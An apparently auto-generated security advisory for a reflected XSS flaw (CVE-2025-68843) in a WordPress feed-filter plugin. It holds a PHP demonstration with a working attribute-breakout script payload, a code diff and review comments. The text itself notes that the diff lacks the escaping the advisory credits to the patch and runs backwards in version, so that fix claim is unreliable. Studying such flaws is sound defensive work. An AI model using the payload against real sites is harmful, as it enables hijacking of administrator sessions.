Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-68843: FeedWordPress Advanced Filters <= 0.6.2 – Reflected Cross-Site Scripting (faf)

Plugin faf
Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 0.6.2
Patched Version 0.61
Disclosed January 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68843:
The FeedWordPress Advanced Filters WordPress plugin, version 0.6.2 and earlier, contains a reflected cross-site scripting vulnerability in its administrative interface. An unauthenticated attacker can place script in a URL parameter, but it only executes when an authenticated user, in practice an administrator, opens the crafted link. The CVSS score of 6.1 (medium) reflects that user-interaction requirement together with the impact on administrative users.

Atomic Edge research identified the root cause as missing output escaping in the plugin's administrative metabox. The sink is the `html_metabox()` function of `/faf/feedwordpress_advanced_filters.php` (in the 0.6.2 layout that function only does `require_once("faf_admin.php")`, and the markup lives in that file). The function writes `$page_type` straight into a double-quoted HTML attribute, as the `html_metabox()` hunk in the diff below shows: `<input type="hidden" name="current_page" value="<?php echo $page_type ?>" />`. `$page_type` is returned by `get_page_type()`, which determines the current page type and context; nothing between that call and the `echo` escapes the value for an HTML attribute context. The same pattern recurs in the filter loop, where `$filter_name` and `$index` are interpolated into `value='$filter_name'` and `id='faf_filterSetting$index'` without escaping.

The exploitation path is the usual one for reflected XSS. The attacker sends an authenticated administrator a link to one of the plugin's admin pages with a JavaScript payload in the URL parameter that feeds `$page_type`, and the value is reflected into the page unescaped. Because it lands inside `value="..."`, a payload that closes the attribute, or the whole `<input>` tag, escapes the attribute context, and the script runs in the victim's browser with the victim's session. From there it can do anything the administrator can do on that page, including adding malicious filters or modifying plugin settings.

According to the analysis, the fix implements proper output escaping in the administrative interface: `faf_admin.php` is removed, its markup is folded into `html_metabox()` in `feedwordpress_advanced_filters.php`, and the echoed values are wrapped in `esc_attr()` for attribute contexts and `esc_html()` for element bodies, so the hidden input would read `value="<?php echo esc_attr($page_type) ?>"`. The patch is also described as removing the PHP 5.2 compatibility code and consolidating the plugin's structure. The diff reproduced below needs to be read with care before that description is relied on: it does remove `faf_admin.php`, inline its content, drop the PHP 5.2 branches and consolidate the plugin, but it contains no `esc_attr()` or `esc_html()` call, both sides still emit `<?php echo $page_type ?>` unescaped, and the `Version:` header and `FAF_VERSION` move from 0.6.2 to 0.6, so the `+` side is an older release than the `-` side. Confirm the escaping against the actual patched release rather than against this diff.
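The sink and its fix side by side, as an added example for this write-up and not code from the FeedWordPress Advanced Filters plugin: `render_current_page_vulnerable()` reproduces the hidden `current_page` input exactly as `html_metabox()`/`faf_admin.php` build it, `render_current_page_hardened()` is the same markup with `esc_attr()`, and a constructed attribute-breakout payload is pushed through both. The `esc_attr()` definition is a stand-in so the script runs outside WordPress; the payload is constructed for the example; and the assumption that `$page_type` can carry an attacker-chosen string comes from the advisory, not from code shown on this page.

```php
<?php
// Added example for this write-up, not code from the FeedWordPress Advanced
// Filters plugin. It reproduces the sink from html_metabox()/faf_admin.php
// (a hidden input whose value="..." is built from $page_type) and shows the
// esc_attr() fix. Assumption (from the advisory, not from code on this page):
// $page_type can carry an attacker-chosen string taken from a URL parameter.

// Stand-in so the script runs outside WordPress. Real esc_attr() differs in
// details (entity normalisation, filters) but, like this, encodes the quote
// and angle-bracket characters that matter in an attribute context.
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string
    {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Vulnerable: the markup as it appears in the plugin, value interpolated raw.
function render_current_page_vulnerable(string $page_type): string
{
    return '<input type="hidden" name="current_page" value="' . $page_type . '" />';
}

// Hardened: same markup, value escaped for a double-quoted HTML attribute.
function render_current_page_hardened(string $page_type): string
{
    return '<input type="hidden" name="current_page" value="' . esc_attr($page_type) . '" />';
}

// Coarse breakout check: the template emits exactly one tag, so any extra '<'
// in the output means the payload opened a new element. A browser is the real
// oracle; this only detects the attribute/tag breakout demonstrated here.
function injected_tag_count(string $html): int
{
    return substr_count($html, '<') - 1;
}

// Constructed payload (not taken from the advisory). A hidden input cannot be
// focused, so an on* handler placed inside the tag would never fire; the
// payload therefore closes the <input> and opens an <img> with onerror.
$payload = '"><img src=x onerror="alert(document.domain)">';

$vuln = render_current_page_vulnerable($payload);
$safe = render_current_page_hardened($payload);

echo "vulnerable: {$vuln}\n";
echo "hardened:   {$safe}\n";

if (injected_tag_count($vuln) !== 1 || injected_tag_count($safe) !== 0) {
    throw new RuntimeException('unexpected rendering result');
}
echo "tag injected in vulnerable output: yes; in hardened output: no\n";
```

Run it with `php` on the command line. The vulnerable render contains a second tag (the injected `<img>`), the hardened one contains only `&quot;`, `&gt;` and `&lt;` inside the attribute value, which is the property a reviewer should look for in the real patched release.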

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an authenticated administrator’s session. This can lead to administrative account takeover, plugin configuration manipulation, injection of malicious filters into syndicated content, and potential site compromise through subsequent attacks. The vulnerability requires user interaction but poses significant risk in multi-user WordPress installations where administrators might click untrusted links.

Differential between vulnerable and patched code

Code Diff
--- a/faf/advanced_filters_overview.php
+++ b/faf/advanced_filters_overview.php
@@ -29,9 +29,9 @@
 public function faf_filters_overview()
 {

-echo "<h2>" . __("Feedwordpress Advanced Filters Overview","faf") . "</h2>";
+echo "<h2>" . __("Feedwordpress Advanced Filters Overview") . "</h2>";

- _e("This page will display the filters from all feeds in the order they will be executed on the posts", "faf");
+ _e("This page will display the filters from all feeds in the order they will be executed on the posts");

 $faf = new FeedwordpressAdvancedFilters();

@@ -45,7 +45,7 @@

  			 echo "<a name='#" . $link->link_name . "' ></a>";
 			 echo "<hr /><h3>" . $link->link_name  . "</h3>";
-
+			//echo "<hr /><p class='faf_overviewContext'>$context <hr /></p>";

 	foreach($filter_array as $context => $filters)
 	{
@@ -64,22 +64,15 @@
 	 		  $av_filters = $faf->get_available_filters();
 	 		  $filter_function = $av_filters[$context][$name]["filter_function"];

-				if (version_compare(PHP_VERSION,"5.3.0","<"))
-					$desc = call_user_func($filter_function.'::get_description'); //php 5.2 compat.
-				else
-					$desc = $filter_function::get_description();
-
+				$desc = $filter_function::get_description();

 	 		  echo "<div class='faf_filterBox'><h4>$desc</h4>";
 	 		   //$filterObj = new $filter_function(array(),$args);
 	 		   //$filterObj->display();
+	 		  // print_R($args);
+
+	 		   $filter_function::getDisplay($args);

-	 		//   $filter_function::getDisplay($args);
-	 		  if (version_compare(PHP_VERSION,"5.3.0","<"))
-	 			   call_user_func_array($filter_function.'::getDisplay',array($args, $filter_function));
-	 		  else
-	 		  	  $filter_function::getDisplay($args);
-
 	 		  	/* foreach($args as $arg_name => $arg_value)
 	 		  	{
 	 		  		if ($arg_value == 1) $arg_value = "yes";
--- a/faf/faf_admin.php
+++ b/faf/faf_admin.php
@@ -1,140 +0,0 @@
-<?php
-	  $page_type = $this->get_page_type($page);
-	  if ($page->for_feed_settings())
-	      $global_array = $this->get_filter_options($page, true, true, true);
-
-     	  $filter_array = $this->get_filter_options($page,true,true);
-
-	  $index = 0; // multiple form fields
-	  if (isset($filter_array["process_setting"]))
-      {
-    	  $process_setting = $filter_array["process_setting"];
-    	  unset($filter_array["process_setting"]); // really? yes really.
-	  }
-	  else
-	     $process_setting = "site-default";
-	?>
-
-<div class="faf_globalFilterBox">
-	<p><?php  _e("Filter processing settings","faf") ?> :</p>
-
-<?php // global settings. Should local filter override after / before / not?
-
-
-		$postSelector = array(
-		'only-global' => __("Only excute filters for all feeds (ignore per feed settings)","faf"),
-		'no-global' => __("Only execute filters per feed (ignore filters for all feeds) ","faf"),
-		'global-first' => __("Execute filters for all feeds first","faf"),
-		'global-last' => __("Execute per feed filters first","faf"),
-		);
-        ?>
-
-        <?php if ($page->for_feed_settings()):
-            if (isset($global_array["process_setting"]))
-	    {        $global_setting = $global_array["process_setting"];
-
-	    }
-	    else
-	    	    $global_setting = 'global-first';
-            $href = "";
-        ?>
-
-
-             <ul class="options global-options">
-             <?php if ($process_setting == 'site-default') $sel = "CHECKED"; else $sel = ""; ?>
-            <li><label><input type="radio" name="faf_process_setting" value="site-default" <?php echo $sel?> />
-               <?php _e("Use the site-wide setting", "faf"); ?></label>
-            <span class="current-setting"><?php _e("Currently:", "faf"); ?><strong> <?php echo $postSelector[$global_setting] ?></strong> (<a href="<?php print $href; ?>"><?php _e("change") ?></a>) </span>
-            </li>
-            </ul>
-
-        <?php endif; // for feed settings ?>
-
-	    <ul class="options local-options">
-	    <?php
-		foreach($postSelector as $value => $text):
-		    if($process_setting == $value)
-		        $sel = "CHECKED";
-		     else
-		        $sel = "";
-		?>
-		<li>
- <input type="radio" name="faf_process_setting" value="<?php echo $value ?>" <?php echo $sel ?> /> <label><?php echo $text ?>
-    </label>
-		</li>
-		<?php
-		endforeach;
-        ?>
-     <?php if ($page->for_feed_settings()):  ?>
-        </ul>
-
-      <?php endif; ?>
-</div>
-
-
-<p class="setting-description"><?php _e("You can pick any number of Filters. The meaning of the values of every filter can differ. Some have extra options as well", "faf"); ?></p>
-
-<div class="faf_notBox"><?php _e("Please remember to click the Save button after making changes!", "faf") ?></div>
-<div class="faf_errorBox"><?php _e("Some fields are required. Please fill them out first!", "faf") ?></div>
-
-	<input type="hidden" name="current_page" value="<?php echo $page_type ?>" />
-
-	<div id="filters">
-	  <?php
-	  foreach ($filter_array as $index => $filter):
-	        $filter_name = $filter["filter_name"];
-	       	$filter_args = $filter["filter_args"];
-	       	$filter_class = $this->available_filters[$page_type][$filter_name]["filter_function"];
-
-	        if ($filter_name != "")
-	        $filter_text = $this->available_filters[$page_type][$filter_name]["filter_text"];
-	        $selected = $filter_name;
-	  ?>
-
-	<div id="faf_filter<?php echo $index ?>" class="faf_filterBox">
-		<?php  if ($filter_name != "")
-		    {
-		        echo "<input type='hidden' name='faf_filter[$index]' value='$filter_name' />";
-		        echo " <h4>" . __($filter_text) . "<span class='delete_filter'>X</span></h4>
-		        <span class='faf_bigFilterNr'>" . ($index+1) . "</span>
-		        <div id='faf_filterSetting$index' class='faf_filterSetting'>";
-		        	$this->showFilterParams($page_type, $filter_name, $index, $filter_args);
-		        echo "</div>";
-
-		        if (method_exists($filter_class,'display_help_text'))
-		        {
-		       	    echo "<div class='faf_filterHelpBox'>";
-		            echo "?";
-		            echo "<span class='faf_filterHelpText'>";
-		    			// php 5.2 workarounds
-					if (version_compare(PHP_VERSION,"5.3.0","<"))
-			            call_user_func($filter_class.'::display_help_text');
-					else
-		            	$filter_class::display_help_text();
-		            echo "</span>";
-		        	echo "</div>";
-		        }
-		    }
-		?>
-
-
-	</div> <!--- /filterdiv -->
-
-	    <?php endforeach; ?>
-	</div> <!--- /filters -->
-	<div >
-			<div class="faf_newerrorBox"><?php _e("Error", "faf") ?></div>
-
-	<?php
-			if ($index > 0 ) $index++;
-		    	 echo "<h2>" . __("New Filter", "faf") . "</h2>";
-		      echo $this->showFilterOptions($page,$index);
-			echo "<input type='button' class='button' name='add_filter' id='add_filter' value='" . __("Add Filter", 'faf') . "'>";
-			echo "<input type='hidden' name='new_filter_index' id='new_filter_index' value='" . $index . "' />";
-
-
-	?>
-	</div>
-	<br />
-	<div class='faf_small'><a href="http://www.weblogmechanic.com/plugins/feedwordpress-advanced-filters/" target="_blank"><?php _e("Feedwordpress Advanced Filters") ?></a> <?php _e("version", 'faf') ?> <?php echo FAF_VERSION ?> <?php _e("by",'faf') ?> Bas Schuiling</div>
-
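Review bot: deleting faf_admin.php does not remove the sink; `<input type="hidden" name="current_page" value="<?php echo $page_type ?>" />` reappears unchanged in the inlined `html_metabox()` body in the next file, still with no `esc_attr()`. The filter loop has the same problem: `value='$filter_name'` and `id='faf_filterSetting$index'` interpolate values that were only ever used as array keys and are never escaped. Wherever this markup ends up, wrap `$page_type` and `$filter_name` in `esc_attr()` and cast `$index` to `(int)`.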
--- a/faf/feedwordpress_advanced_filters.php
+++ b/faf/feedwordpress_advanced_filters.php
@@ -3,7 +3,7 @@
 Plugin Name: Feedwordpress Advanced Filters
 Plugin URI: http://www.weblogmechanic.com/plugins/feedwordpress-advanced-filters/
 Description: Feedwordpress Advanced Filters allows you to filter and manipulate Feedwordpress posts from feeds.
-Version: 0.6.2
+Version: 0.6
 Author: Bas Schuiling
 Author URI: http://www.weblogmechanic.com/
 License: GPL
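Review bot: the `Version:` header goes from 0.6.2 to 0.6 in this hunk, so the `+` side is the older release; for a vulnerable-to-patched comparison the direction looks reversed, or the trees being compared are not the advisory's 0.6.2 and patched builds. A release must never decrement this header, since WordPress's update check keys off it; the same applies to `FAF_VERSION` in the next hunk.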
@@ -21,9 +21,11 @@

 define('FAF_DEBUG',false);
 define('FAF_FILTERS',"fafFilter");
-define('FAF_VERSION','0.6.2');
+define('FAF_VERSION','0.6');

-class FeedWordPressAdvancedFilters
+
+
+Class FeedWordPressAdvancedFilters
 {
 	private $available_filters = array(); // Set by function so class may be extended
     private $current_filter_options;
@@ -96,7 +98,7 @@

 			}

- 		  add_action('init', array($this,'set_available_filters')); // load filters
+ 		  $this->set_available_filters(); // load filters
 	}

 	/* Plugin initialisation function
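Review bot: calling `$this->set_available_filters()` directly from the constructor instead of hooking it to `init` means `get_declared_classes()` runs when this plugin file loads, so filter subclasses declared by a plugin or theme that loads later are never registered; the `init` action existed to defer that scan. If the direct call stays, the later visibility change to `protected` is consistent with it, but the deferral should be kept or the load-order requirement documented.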
@@ -104,12 +106,8 @@
 	* Init is called by Wordpress on plugin startup. Registers styles, javascripting etc to the Wordpress handler
 	*
 	*/
-	public function init($hook)
+	public function init()
     	{
-		// prevents FAF from loading everywhere in wp-admin
-    	if (strpos($hook, 'feedwordpress') === false && strpos($hook, 'faf') === false)
-			return;
-
 		wp_register_style( 'faf_style', plugins_url('faf_style.css', __FILE__) );
 		wp_enqueue_style('faf_style');
 		wp_register_script('faf-js', plugins_url('faf.js',__FILE__));
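Review bot: dropping the `$hook` parameter and the `strpos($hook, 'feedwordpress')` / `'faf'` guard makes `init()` register and enqueue `faf_style` and `faf-js` on every wp-admin screen; the deleted comment states exactly why the guard existed. Keep the check, or gate on `get_current_screen()` if `init()` will no longer be called from `admin_enqueue_scripts`, which is the only hook that passes `$hook`.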
@@ -120,33 +118,10 @@
            		 array( 'ajax_url' => admin_url( 'admin-ajax.php' ), 'we_value' => $nonce,
            		 		'loader_url' => plugins_url('images/ajax-loader.gif',__FILE__ ) ) );

-
+      	//load_plugin_textdomain( 'faf', false, dirname( plugin_basename( __FILE__ ) ) . '/languages/' );

 	}

-	/* Load plugin textdomain
-	*
-	* @since 0.7
-	*/
-	public function load_plugin_textdomain()
-	{
-		$domain = 'faf';
-		load_plugin_textdomain($domain, FALSE, dirname(plugin_basename(__FILE__)).'/languages/');
-	}
-
-
-
-	/* Init of scripts for FAF.
-	*
-	* This function is seperate because it uses admin_enqueue_scripts to prevent loading from other parts of
-	* WP-admin.
-	*/
-	/*public function init_script()
-	{
-
-
-	} */
-

 	/**
 	* Set all available filters
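Review bot: `load_plugin_textdomain()` is removed and left as a comment in `init()`, so the `/languages/` catalogs are never loaded, and the `'faf'` text domain is also stripped from the `__()`/`_e()` calls throughout this patch. Together that disables localisation of the plugin entirely; if that is intended it belongs in the commit message, otherwise restore the `init`-hooked loader and the `"faf"` domain arguments.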
@@ -167,7 +142,7 @@
 	*
 	* @since 0.1
 	*/
-	public function set_available_filters()
+	protected function set_available_filters()
 	{
 	   $classes = get_declared_classes();

@@ -177,13 +152,11 @@
 	   {
 	   	if (is_subclass_of($c, FAF_FILTERS))
 		{
-	 			$name = $c::$name;
-	 			$context = $c::$context;
- 	  			$desc = $c::get_description();
-	  	 		$av_filters[$context][$name] = array("filter_text" => $desc, "filter_function" => $c);
-				$av_filters[$context][$name]["filter_controls"] = $c::getControls();
-			// done
-
+	 		$name = $c::$name;
+	 		$context = $c::$context;
+ 	  		$desc = $c::get_description();
+  	 		$av_filters[$context][$name] = array("filter_text" => $desc, "filter_function" => $c);
+			$av_filters[$context][$name]["filter_controls"] = $c::getControls();
 	  		if(method_exists($c,"process_complete"))
 	  			$this->process_complete[] = $c;
 		}
@@ -217,7 +190,7 @@
 	    $this->debug = false;
 		add_meta_box(
 			/*id=*/ 'faf',
-			/*title=*/ __('Feedwordpress Advanced Filters', 'faf'),
+			/*title=*/ __('Feedwordpress Advanced Filters'),
 			/*callback=*/ array($this, 'html_metabox'),
 			/*page=*/ $page->meta_box_context(),
 			/*context=*/ $page->meta_box_context()
@@ -233,8 +206,141 @@
 	* @param Object $FeedWordPress Page object
 	*/
 	public function html_metabox($page)
-	{
-	 	require_once("faf_admin.php");
+	{
+	  $page_type = $this->get_page_type($page);
+	  if ($page->for_feed_settings())
+	      $global_array = $this->get_filter_options($page, true, true, true);
+
+     	  $filter_array = $this->get_filter_options($page,true,true);
+
+	  $index = 0; // multiple form fields
+	  if (isset($filter_array["process_setting"]))
+      {
+    	  $process_setting = $filter_array["process_setting"];
+    	  unset($filter_array["process_setting"]); // really? yes really.
+	  }
+	  else
+	     $process_setting = "site-default";
+	?>
+
+<div class="faf_globalFilterBox">
+	<p><?php  _e("Filter processing settings") ?> :</p>
+<?php // global settings. Should local filter override after / before / not?
+
+		//$thesePosts = $page->these_posts_phrase();
+		$postSelector = array(
+		'only-global' => __("Only excute filters for all feeds (ignore per feed settings)"),
+		'no-global' => __("Only execute filters per feed (ignore filters for all feeds) "),
+		'global-first' => __("Execute filters for all feeds first"),
+		'global-last' => __("Execute per feed filters first"),
+		);
+        ?>
+
+        <?php if ($page->for_feed_settings()):
+            if (isset($global_array["process_setting"]))
+	    {        $global_setting = $global_array["process_setting"];
+
+	    }
+	    else
+	    	    $global_setting = 'global-first';
+            $href = "";
+        ?>
+
+
+             <ul class="options global-options">
+             <?php if ($process_setting == 'site-default') $sel = "CHECKED"; else $sel = ""; ?>
+            <li><label><input type="radio" name="faf_process_setting" value="site-default" <?php echo $sel?> />
+               <?php _e("Use the site-wide setting"); ?></label>
+            <span class="current-setting"><?php _e("Currently:"); ?><strong> <?php echo $postSelector[$global_setting] ?></strong> (<a href="<?php print $href; ?>"><?php _e("change") ?></a>) </span>
+            </li>
+            </ul>
+
+        <?php endif; // for feed settings ?>
+
+	    <ul class="options local-options">
+	    <?php
+		foreach($postSelector as $value => $text):
+		    if($process_setting == $value)
+		        $sel = "CHECKED";
+		     else
+		        $sel = "";
+		?>
+		<li>
+ <input type="radio" name="faf_process_setting" value="<?php echo $value ?>" <?php echo $sel ?> /> <label><?php echo $text ?>
+    </label>
+		</li>
+		<?php
+		endforeach;
+        ?>
+     <?php if ($page->for_feed_settings()):  ?>
+        </ul>
+
+      <?php endif; ?>
+</div>
+
+
+<p class="setting-description"><?php _e("You can pick any number of Filters. The meaning of the values of every filter can differ. Some have extra options as well"); ?></p>
+
+<div class="faf_notBox"><?php _e("Please remember to click the Save button after making changes!") ?></div>
+<div class="faf_errorBox"><?php _e("Some fields are required. Please fill them out first!") ?></div>
+
+	<input type="hidden" name="current_page" value="<?php echo $page_type ?>" />
+
+	<div id="filters">
+	  <?php
+	  foreach ($filter_array as $index => $filter):
+	        $filter_name = $filter["filter_name"];
+	       	$filter_args = $filter["filter_args"];
+	       	$filter_class = $this->available_filters[$page_type][$filter_name]["filter_function"];
+
+	        if ($filter_name != "")
+	        $filter_text = $this->available_filters[$page_type][$filter_name]["filter_text"];
+	        $selected = $filter_name;
+	  ?>
+
+	<div id="faf_filter<?php echo $index ?>" class="faf_filterBox">
+		<?php  if ($filter_name != "")
+		    {
+		        echo "<input type='hidden' name='faf_filter[$index]' value='$filter_name' />";
+		        echo " <h4>" . __($filter_text) . "<span class='delete_filter'>X</span></h4>
+		        <span class='faf_bigFilterNr'>" . ($index+1) . "</span>
+		        <div id='faf_filterSetting$index' class='faf_filterSetting'>";
+		        	echo $this->showFilterParams($page_type, $filter_name, $index, $filter_args);
+		        echo "</div>";
+		        if (method_exists($filter_class,'display_help_text'))
+		        {
+		       	    echo "<div class='faf_filterHelpBox'>";
+		            echo "?";
+		            echo "<span class='faf_filterHelpText'>";
+		            $filter_class::display_help_text();
+		            echo "</span>";
+		        	echo "</div>";
+		        }
+		    }
+		?>
+
+
+	</div> <!--- /filterdiv -->
+
+	    <?php endforeach; ?>
+	</div> <!--- /filters -->
+	<div >
+			<div class="faf_newerrorBox"><?php _e("Error") ?></div>
+
+	<?php
+			if ($index > 0 ) $index++;
+		    	 echo "<h2>" . __("New Filter") . "</h2>";
+		      echo $this->showFilterOptions($page,$index);
+			echo "<input type='button' name='add_filter' id='add_filter' value='" . __("Add Filter") . "'>";
+			echo "<input type='hidden' name='new_filter_index' id='new_filter_index' value='" . $index . "' />";
+
+
+	?>
+	</div>
+	<br />
+	<div class='faf_small'><a href="http://www.weblogmechanic.com/plugins/feedwordpress-advanced-filters/" target="_blank"><?php _e("Feedwordpress Advanced Filters") ?></a> <?php _e("version") ?> <?php echo FAF_VERSION ?> <?php _e("by") ?> Bas Schuiling</div>
+
+	<?php

 	} // html_metabox

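Review bot: the inlined body still emits `<input type="hidden" name="current_page" value="<?php echo $page_type ?>" />` with no `esc_attr()`, so this hunk does not fix the attribute-context XSS the write-up attributes to `html_metabox()`; `value='$filter_name'` and `id='faf_filterSetting$index'` are likewise unescaped. Separately, `echo $this->showFilterParams(...)` replaces a bare call: if `showFilterParams()` writes its output directly (the later hunk that ends with `echo "</div>";` suggests it does) the `echo` is a no-op, and if it returns a string the old code silently dropped it; a comment should say which. Dropping `class='button'` from the Add Filter input also loses the admin button styling.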
@@ -287,7 +393,6 @@
 		$filter_class = $this->available_filters[$page_type][$filter_name]["filter_function"];
 		$filter_validate = array(); // collect validation info

-
 		foreach($filter_options as $filter_option) // loop all style elements
 		{

@@ -335,14 +440,8 @@
 		 		}
 		 	break;
 		 	default: // assume special function
-		 		if (method_exists($filter_class,$type))
-		 		{
-		 			// php 5.2 workarounds
-					if (version_compare(PHP_VERSION,"5.3.0","<"))
-		 	  		  	call_user_func_array($filter_class.'::'.$type, array($page_type, $index, $current_value, $desc));
-		 	  		else
-		 	  			$filter_class::$type($page_type, $index, $current_value, $desc);
-		 	  	}
+		 		if (method_exists($filter_class,$type))
+		 	  	$filter_class::$type($page_type, $index, $current_value, $desc);
 		 	break;
 		 }
 		 echo "</div>";
@@ -447,6 +546,10 @@
     $this->save_filter_options($page, $filter_array);
 }

+
+
+
+
     /**
     * Determines the current page type and context
     *
@@ -653,11 +756,6 @@
 	public function faf_decide_filter($args, $args2)
 	{
 		// Syndicate_item hook. $args = assoc array of post to be inserted
-		faf_debug("FAF deciding on filters on post to be syndicated:");
-		faf_debug($args["post_title"]);
-		faf_debug($args);
-		 		// return $args;
-
 		$post = $args;

 		$av_filters = $this->available_filters;
@@ -666,13 +764,12 @@

 		// will loop trough all filters selected with this feed.
 		$syndiPost = $args2; // args 2 is of Syndipost class
-
-
-
-     	$filter_array = $this->get_filter_tree($syndiPost->link);
+
+     	   $filter_array = $this->get_filter_tree($syndiPost->link);

 		if (empty($filter_array) || ! is_array($filter_array))
 		{
+
 			return $post;
 		}

@@ -691,8 +788,7 @@
 			    {
 				    $filter_function = $av_filters[$context][$filter_name]["filter_function"];
 				    $filter_args = $filter["filter_args"];
-					faf_debug("Doing filter:" . $filter_function);
-
+
 				    $filterObj = new $filter_function($post,$filter_args);
 				    $post = $filterObj->execute(); // do it!
 			    }
@@ -706,9 +802,7 @@
 			faf_debug("Serious problem: Filters returned no post");
 			$post = $args;
 		}
-		 faf_debug("Decide filter: Returning post, everything seems orderly :" . $post["post_title"]);
-		 faf_debug($post);
-
+     //	faf_debug( $post );
 		 return $post;
 	}

@@ -716,12 +810,7 @@
 	{
 		foreach($this->process_complete as $c)
 		{
-
-			// php 5.2 workarounds
-			if (version_compare(PHP_VERSION,"5.3.0","<"))
-				call_user_func($c.'::process_complete');
-			else
-				$c::process_complete();
+			$c::process_complete();
 		}
 	}

@@ -752,13 +841,7 @@
 	  	    echo "<div class='faf_filterHelpBox'>";
 	        echo "?";
 	        echo "<span class='faf_filterHelpText'>";
-
-	        // php 5.2 workarounds
-			if (version_compare(PHP_VERSION,"5.3.0","<"))
-		        call_user_func($filter_class.'::display_help_text');
-			else
 		        $filter_class::display_help_text();
-
 	        echo "</span>";
 	      	echo "</div>";
 	   }
@@ -773,9 +856,7 @@
 if (is_admin())
 {
 	add_action("admin_menu","overviewSubMenu",100);
-	add_action('admin_enqueue_scripts', array($faf, 'init'));
-	add_action('init', array($faf, 'load_plugin_textdomain'));
-//	add_action('admin_enqueue_scripts', array($faf,'init_script') );
+	add_action('admin_init', array($faf, 'init'));
 	register_activation_hook (__FILE__, 'faf_install');
 	register_uninstall_hook (__FILE__, 'faf_uninstall');
 }
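Review bot: moving the callback from `admin_enqueue_scripts` to `admin_init` means `init()` no longer receives the `$hook` suffix, which is what the removed guard in `init()` used to restrict loading to FeedWordPress/FAF screens; `wp_enqueue_style`/`wp_enqueue_script` still work from `admin_init`, but `admin_enqueue_scripts` is the documented hook for admin assets, and the nonce passed through `wp_localize_script` is now generated on every admin request. Keep `admin_enqueue_scripts` together with the screen check.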
@@ -868,6 +949,10 @@
  	die( __("Feedwordpress plugin is required for Feedwordpress Advanced Filters to work!") );
  }

+ if (version_compare(PHP_VERSION,'5.3.0','<')) {
+ 	deactivate_plugins( __FILE__  );
+ 	die( __("Feedwordpress Advanced Filters requires at least PHP version 5.3 to work!"));
+ 	}
 }


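Review bot: the new PHP 5.3 check lives only in the activation routine, so an install that was activated earlier and is later moved to a PHP < 5.3 host never hits it and instead fatals on the `$c::method()` static-call syntax the rest of this patch now relies on; a guard at plugin load, before the class is defined, would cover that case. `deactivate_plugins(__FILE__)` is fine as written, since WordPress runs `plugin_basename()` on its argument.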
@@ -879,11 +964,9 @@
 	*/
 	 function faf_debug($msg)
 	{
-		echo "<p>" ;
-		print_r($msg);
-		echo  "</p>";
+
 		if (function_exists("console"))
-		{
+		{
 			console($msg);
 		}
 	//	FeedWordpress::diagnostic('updated_feeds:errors',$msg);
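Review bot: on the `-` side `faf_debug()` prints its argument with `print_r()` between `<p>` tags, and `faf_decide_filter()` in the earlier hunks calls it with the whole post array (`faf_debug($args)`, `faf_debug($post)`), so during a feed update the raw syndicated title and content go into the response unescaped; `FAF_DEBUG` is defined `false` at the top of the file but, in the lines shown, `faf_debug()` never consults it. The `+` side stops the echo, which closes that hole; if debug output is ever reinstated, gate it on `FAF_DEBUG` and pass it through `esc_html()`.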
--- a/faf/filters.php
+++ b/faf/filters.php
@@ -41,29 +41,29 @@

 	$controls["filter_value"] = array(
 			"name" => "filter_value",
-			"desc" => __("Value", "faf"),
+			"desc" => __("Value"),
 			"type" => "text",
 			"required" => true);
 	$controls["search_title"] = array(
 			"name" => "filter_search_title",
-			"desc" => __("Search in Title", "faf"),
+			"desc" => __("Search in Title"),
 			"type" => "checkbox");
 	$controls["search_excerpt"] = array(
 			"name" => "filter_search_excerpt",
-			"desc" => __("Search in Excerpt", "faf"),
+			"desc" => __("Search in Excerpt"),
 			"type" => "checkbox");
 	$controls["search_content"] = array(
 			"name" => "filter_search_content",
-			"desc" => __("Search in Content", "faf"),
+			"desc" => __("Search in Content"),
 			"type" => "checkbox",
 			"default" => "1");
 	$controls["match_entire_word"] = array(
 			"name" => "filter_match_word",
-			"desc" => __("Only match entire word", "faf"),
+			"desc" => __("Only match entire word"),
 			"type" => "checkbox");
 	$controls["match_case"] = array(
 			"name" => "filter_match_case",
-			"desc" => __("Only match case", "faf"),
+			"desc" => __("Only match case"),
 			"type" => "checkbox");

      	return $controls;
@@ -92,23 +92,11 @@
     * This function tries to get find a display function per type of control
     *
     */
-    public static function getDisplay($args = array(), $class = "")
+    public static function getDisplay($args = array())
 	{
-		//$controls = call_user_func_array($c.'::getControls',$c);
-
-	faf_debug(version_compare(PHP_VERSION,"5.3.0","<"));
-
-		// php 5.2 workarounds
-		if (version_compare(PHP_VERSION,"5.3.0","<"))
-		{
-			$controls = call_user_func_array($class.'::getControls',$class);
-		}
-		else
-		{
-			$c = get_called_class();
-			$controls = $c::getControls();
-		}
+		$c = get_called_class();

+		$controls = $c::getControls();
 		echo "<div class='faf_filterSetting'>";
 		foreach($controls as $control)
 		{
@@ -123,13 +111,7 @@
 			if (method_exists($c, "display_" . $type))
 			{
 				$method = "display_" . $type;
-
-				// php 5.2 workarounds
-				if (version_compare(PHP_VERSION,"5.3.0","<"))
-					call_user_func_array($c.'::'.$method, array($control, $value));
-				else
-					$c::$method($control, $value);
-
+				$c::$method($control, $value);
 			}

 		}
@@ -180,32 +162,17 @@
     *
     * @return Array Control_array Array of controls ( see documentation for format )
     */
-    public static function getControls($class = "" )
+    public static function getControls()
     {
-    	$control_array = array();
-		// php 5.2 workarounds
-		if (version_compare(PHP_VERSION,"5.3.0","<"))
-		{
-			$vars = get_class_vars($class);
-			$defined_controls = call_user_func($class.'::setControls');
-	 	   $use_control = explode(",",$vars['controls']);
-		}
-		else
-		{
-			$c = get_called_class();
-			$defined_controls = $c::setControls();
-			$use_control = explode(",",$c::$controls);
-		}
-
-
-
-   	foreach($use_control as $control)
+    	$c = get_called_class();
+    	$defined_controls = $c::setControls();
+    $control_array = array();
+    $use_control = explode(",",$c::$controls);
+    	foreach($use_control as $control)
 	    	{
 	    			if (isset($defined_controls[trim($control)]))
 		    			 $control_array[] = $defined_controls[trim($control)];
 	    	}
-
-
     	return $control_array;
     }
  }
--- a/faf/filters/categories_keyword.php
+++ b/faf/filters/categories_keyword.php
@@ -14,14 +14,14 @@
 	{
 		 _e("Specify keyword(s) and categories. If the keyword matches this post will additionally added to your selected categories
 		 You can use multiple keywords by entering them comma-seperated
-		", "faf");
+		");

 	}

 	/* Function not an attribute due for gettext */
 	public static function get_description()
 	{
